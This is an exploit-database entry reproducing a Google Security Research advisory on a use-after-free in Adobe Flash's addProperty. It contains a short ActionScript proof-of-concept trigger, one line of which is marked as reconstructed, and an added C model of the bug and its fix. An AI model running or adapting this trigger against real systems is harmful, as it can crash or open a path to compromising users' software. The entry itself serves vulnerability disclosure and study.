Adobe Flash - addProperty Use-After-Free

ID 1337DAY-ID-26015
Type zdt
Reporter Google Security Research
Modified 2016-05-17T00:00:00


Exploit for multiple platforms in category dos / poc

There is a use-after-free in addProperty. If a property is added to a MovieClip object that already has a watch defined on that property, and the watch callback deletes the MovieClip, the MovieClip is used after it is freed.
A minimal PoC follows:
var t = this.createEmptyMovieClip("t", 1);
t.watch("a", func);
t.addProperty("a", func, func);
function func(){
    t.removeMovieClip(); // the watch callback deletes the clip, as described above (exact call assumed; this line is not preserved on the page)
}
A sample fla and swf are attached.
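To show the bug class and the usual fix in a form that can be run, here is an added C model (not code from the advisory or from Flash, all names hypothetical): a watch callback fires in the middle of addProperty, and when it removes the MovieClip the rest of addProperty writes to the torn-down object; the hardened version holds a reference across the callback. The model marks objects destroyed rather than freeing them so the behaviour is deterministic.

```c
/* Added example, not code from the advisory or from Flash: a C model of the bug
 * class above. A watch callback runs in the middle of addProperty; when it removes
 * the MovieClip, the rest of addProperty touches the torn-down object. The model
 * marks objects destroyed instead of freeing them so the test stays deterministic.
 * All names here are hypothetical. */
#include <stdlib.h>

typedef struct MovieClip MovieClip;
typedef void (*WatchFn)(MovieClip *clip);

struct MovieClip {
    int refcount;
    int destroyed;       /* set once the last reference is dropped */
    int property_count;  /* properties added with addProperty() */
    WatchFn watch;       /* callback registered with watch() */
};

static int g_uses_after_destroy;  /* observed writes to a destroyed clip */

static MovieClip *clip_new(WatchFn watch) {
    MovieClip *c = calloc(1, sizeof *c);
    if (!c) abort();
    c->refcount = 1;  /* the owning display list holds this reference */
    c->watch = watch;
    return c;
}
static void clip_retain(MovieClip *c) { c->refcount++; }
static void clip_release(MovieClip *c) { if (--c->refcount == 0) c->destroyed = 1; }

/* Models a field write inside addProperty; records it if the clip is already gone. */
static void store_property(MovieClip *c) {
    if (c->destroyed) g_uses_after_destroy++;
    c->property_count++;
}

/* Vulnerable shape: the watch callback may drop the last reference, and the
 * write that follows it is the use-after-free. */
static void add_property_vulnerable(MovieClip *c) {
    if (c->watch) c->watch(c);
    store_property(c);
}

/* Hardened shape: hold a reference across any reentrant callback so the object
 * outlives the operation, and drop it only once the operation is complete. */
static void add_property_fixed(MovieClip *c) {
    clip_retain(c);
    if (c->watch) c->watch(c);
    store_property(c);
    clip_release(c);
}

/* The watch callback from the PoC: removeMovieClip() drops the owner's reference. */
static void watch_removes_clip(MovieClip *c) { clip_release(c); }
```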

# [2018-01-08]  #